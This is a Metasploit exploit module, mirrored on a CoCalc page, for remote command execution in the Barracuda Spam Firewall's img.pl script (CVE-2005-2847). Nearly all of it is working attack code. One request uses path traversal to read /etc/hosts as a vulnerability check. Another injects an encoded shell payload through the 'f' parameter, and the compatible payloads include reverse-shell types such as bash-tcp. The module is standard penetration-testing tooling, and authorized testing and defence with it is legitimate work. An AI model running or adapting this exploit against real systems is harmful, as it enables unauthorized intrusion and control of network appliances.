Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/barracuda_img_exec.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Barracuda IMG.PL Remote Command Execution',

17
        'Description' => %q{

18
          This module exploits an arbitrary command execution vulnerability in the

19
          Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.

20
        },

21
        'Author' => [ 'Nicolas Gregoire <ngregoire[at]exaprobe.com>', 'hdm' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          ['CVE', '2005-2847'],

25
          ['OSVDB', '19279'],

26
          ['BID', '14712'],

27
          ['URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19556']

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'DisableNops' => true,

32
          'Space' => 4000,

33
          'Compat' =>

34
                        {

35
                          'PayloadType' => 'cmd cmd_bash',

36
                          'RequiredCmd' => 'generic perl ruby bash-tcp telnet',

37
                        }

38
        },

39
        'Platform' => 'unix',

40
        'Arch' => ARCH_CMD,

41
        'Targets' => [[ 'Automatic', {}]],

42
        'DisclosureDate' => '2005-09-01',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('URI', [true, "The full URI path to img.pl", "/cgi-bin/img.pl"]),

55
      ]

56
    )

57
  end

58


59
  def check

60
    res = send_request_cgi({

61
      'uri' => normalize_uri(datastore['URI']),

62
      'vars_get' =>

63
      {

64
        'f' => ("../" * 8) + "etc/hosts"

65
      }

66
    }, 25)

67


68
    if (res and res.body.match(/localhost/))

69
      return Exploit::CheckCode::Vulnerable

70
    end

71


72
    return Exploit::CheckCode::Safe

73
  end

74


75
  def exploit

76
    res = send_request_cgi({

77
      'uri' => normalize_uri(datastore['URI']),

78
      'vars_get' =>

79
      {

80
        'f' => ("../" * 8) + %Q!bin/sh -c "echo 'YYY'; #{payload.encoded}; echo 'YYY'"|!

81
      }

82
    }, 25)

83


84
    if (res)

85
      print_status("The server returned: #{res.code} #{res.message}")

86
      print("")

87


88
      m = res.body.match(/YYY(.*)YYY/)

89


90
      if (m)

91
        print_status("Command output from the server:")

92
        print(m[1])

93
      else

94
        print_status("This server may not be vulnerable")

95
      end

96


97
    else

98
      print_status("No response from the server")

99
    end

100
  end

101
end

102


103